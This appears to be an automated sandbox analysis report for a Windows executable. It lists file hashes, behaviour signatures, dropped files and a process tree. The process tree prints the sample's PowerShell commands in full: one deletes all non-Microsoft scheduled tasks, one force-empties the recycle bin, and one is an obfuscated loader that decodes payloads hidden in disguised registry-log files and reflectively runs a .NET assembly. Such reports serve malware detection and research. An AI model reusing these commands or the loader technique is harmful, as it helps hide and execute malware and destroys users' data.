Analysis

  • max time kernel
    96s
  • max time network
    97s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240802-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system
  • submitted
    19-09-2024 07:05

General

  • Target

    5cf02ef8ba3cb12bacf44b35ae71e53357ecfadffbebf02057004c791bedb476N.exe

  • Size

    4.8MB

  • MD5

    314416cd8a7ca237e550fd7b77acf770

  • SHA1

    fb7e229e6782aba64a9d781d0605aed586627331

  • SHA256

    5cf02ef8ba3cb12bacf44b35ae71e53357ecfadffbebf02057004c791bedb476

  • SHA512

    831b85064956d3372f7e7019900aea5c96cfa4ae9b3d1a2ff904376191fe1fc2452d7d13ce701b3fce3765c867effd4d0b6c0d5f7d1d725c79ed9c53f8621f1d

  • SSDEEP

    49152:uqj00f62wSvIi8kyyOiIBQoKHnHuB1UAjwqbMVaydWfOHSCyN78/NW6g/yjKj63W:uieSvPy0IKoKHHIMzx5bN84s

Malware Config

Signatures

  • Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

    Using powershell.exe command.

  • Enumerates connected drives 3 TTPs 1 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Hide Artifacts: Ignore Process Interrupts 1 TTPs 1 IoCs

    Command interpreters often include specific commands/flags that ignore errors and other hangups.

  • Suspicious behavior: EnumeratesProcesses 6 IoCs
  • Suspicious use of AdjustPrivilegeToken 24 IoCs
  • Suspicious use of WriteProcessMemory 6 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\5cf02ef8ba3cb12bacf44b35ae71e53357ecfadffbebf02057004c791bedb476N.exe
    "C:\Users\Admin\AppData\Local\Temp\5cf02ef8ba3cb12bacf44b35ae71e53357ecfadffbebf02057004c791bedb476N.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:4220
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "powershell.exe" -Command " $tasks = Get-ScheduledTask | Where-Object { $_.TaskPath -notlike '\Microsoft\Windows\*' -and $_.TaskName -ne 'VideoConvertor' } foreach ($task in $tasks) { try { Unregister-ScheduledTask -TaskName $task.TaskName -Confirm:$false } catch { continue } } "
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:1916
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "powershell.exe" -Command "Clear-RecycleBin -Force -ErrorAction SilentlyContinue"
      2⤵
      • Enumerates connected drives
      • Hide Artifacts: Ignore Process Interrupts
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:3564
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "powershell.exe" -Command " Function Init-VideoCache ([String] $CacheBuffer) { $CacheList = [System.Collections.Generic.List[Byte]]::new(); for ($i = 0; $i -lt $CacheBuffer.Length; $i += 8) { $CacheList.Add([Convert]::ToByte($CacheBuffer.Substring($i, 8), 2)) } return [System.Text.Encoding]::ASCII.GetString($CacheList.ToArray()) }; function Clear-VideoTempFiles { param([string] $tempPath) $tempFiles = $tempPath.Split(' ') $buffer = New-Object 'byte[]' ($tempFiles.Count / 2) $count = 0 for ($i = 0; $i -lt $tempFiles.Count - 1; $i += 2) { $buffer[$count] = [byte]($tempFiles[$i]) $count++ } return $buffer } $TempCache = Clear-VideoTempFiles (Get-Content -Path 'C:\Users\Admin\\NTUSER.DAT{428f1209-1254-13ef-ada4-080027dede23}.TxR.blf') $BootImage = Clear-VideoTempFiles (Get-Content -Path 'C:\Users\Admin\\NTUSER.DAT{4280000a-1254-11ef-ada2-080007dede23}.TM.blf') $BootParser = Init-VideoCache(Get-Content -Path 'C:\Users\Admin\\NTUSER.DAT{54ss24a-13354-13f-aad43-333333}.TM.blf') $SystemConfig = (Get-Content -Path 'C:\Users\Admin\\NTUSER.DAT{428f120a-1254-eeeef-ada2-080027dede23}.TM.blf') $CleanupTask = (Get-Content -Path 'C:\Users\Admin\\NTUSER.DAT{428f4444a-13354-11ef-sdd2-080027dede23}.TM.blf') $Image = (Get-Content -Path 'C:\Users\Admin\\NTUSER.DAT{428f4444a-13354-11ef-aad43-080027dede23}.TM.blf') $Module = (Get-Content -Path 'C:\Users\Admin\\NTUSER.DAT{543454444a-13354-11ef-aad43-080027dede23}.TM.blf') $LookupModule = (Get-Content -Path 'C:\Users\Admin\\NTUSER.DAT{543ss44a-13354-113f-aad43-08227dede23}.TM.blf') $ModuleParams = (Get-Content -Path 'C:\Users\Admin\\NTUSER.DAT{54ss24a-13354-13f-aad43-5227de33}.TM.blf') $SystemAssembly = [Reflection.Assembly] $SystemAssembly::$Module([Byte[]]$BootImage).$LookupModule($SystemConfig).$ModuleParams($CleanupTask).$Image($null,[Object[]]($BootParser,[Byte[]]$TempCache)) "
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:3708

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

    Filesize

    3KB

    MD5

    661739d384d9dfd807a089721202900b

    SHA1

    5b2c5d6a7122b4ce849dc98e79a7713038feac55

    SHA256

    70c3ecbaa6df88e88df4efc70968502955e890a2248269641c4e2d4668ef61bf

    SHA512

    81b48ae5c4064c4d9597303d913e32d3954954ba1c8123731d503d1653a0d848856812d2ee6951efe06b1db2b91a50e5d54098f60c26f36bc8390203f4c8a2d8

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

    Filesize

    1KB

    MD5

    f3b2f7c8e9b3057a4342efce5cb1f648

    SHA1

    cbcab1b48cd397259c504d2c915c5c30ea877b06

    SHA256

    2c3dc036ac8d51e14510a0a6bba650d29e55c394b3b564a5f762c2fc1ebc3693

    SHA512

    f627a062084919835cdfadcaa06849d6a636e4b2f6a24317c29e78183c02b4e2ffa9cf0911f627efc2143514695a1b3e70141866f61c722039721182cd5fb142

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

    Filesize

    64B

    MD5

    9a9f097131cf0a3486b843bcdbfe297c

    SHA1

    1e3988e316721aa0e8c6f659fa4e8a0217739028

    SHA256

    dc773c20d59f6886b1a5b813abc4da6ce98abb0ade60b2ebabb091f55e265abd

    SHA512

    efc807932ae6ab83d0dfbad3384655a0b44648a163c71f31f7cd9003d7dea83371d08caba46bf6837f99dae2fe201cd902da33c40e37cc7d2671db7d9f79210d

  • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_tfuxjptm.2dm.ps1

    Filesize

    60B

    MD5

    d17fe0a3f47be24a6453e9ef58c94641

    SHA1

    6ab83620379fc69f80c0242105ddffd7d98d5d9d

    SHA256

    96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

    SHA512

    5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

  • memory/1916-16-0x00007FFD85C80000-0x00007FFD86741000-memory.dmp

    Filesize

    10.8MB

  • memory/1916-15-0x00007FFD85C80000-0x00007FFD86741000-memory.dmp

    Filesize

    10.8MB

  • memory/1916-0-0x00007FFD85C83000-0x00007FFD85C85000-memory.dmp

    Filesize

    8KB

  • memory/1916-12-0x00007FFD85C80000-0x00007FFD86741000-memory.dmp

    Filesize

    10.8MB

  • memory/1916-11-0x00007FFD85C80000-0x00007FFD86741000-memory.dmp

    Filesize

    10.8MB

  • memory/1916-1-0x000002679FFB0000-0x000002679FFD2000-memory.dmp

    Filesize

    136KB

  • memory/3564-18-0x00007FFD85C80000-0x00007FFD86741000-memory.dmp

    Filesize

    10.8MB

  • memory/3564-19-0x00007FFD85C80000-0x00007FFD86741000-memory.dmp

    Filesize

    10.8MB

  • memory/3564-31-0x00007FFD85C80000-0x00007FFD86741000-memory.dmp

    Filesize

    10.8MB

  • memory/3708-44-0x0000022FF0E60000-0x0000022FF107C000-memory.dmp

    Filesize

    2.1MB

  • memory/4220-32-0x00007FF7362E0000-0x00007FF736766000-memory.dmp

    Filesize

    4.5MB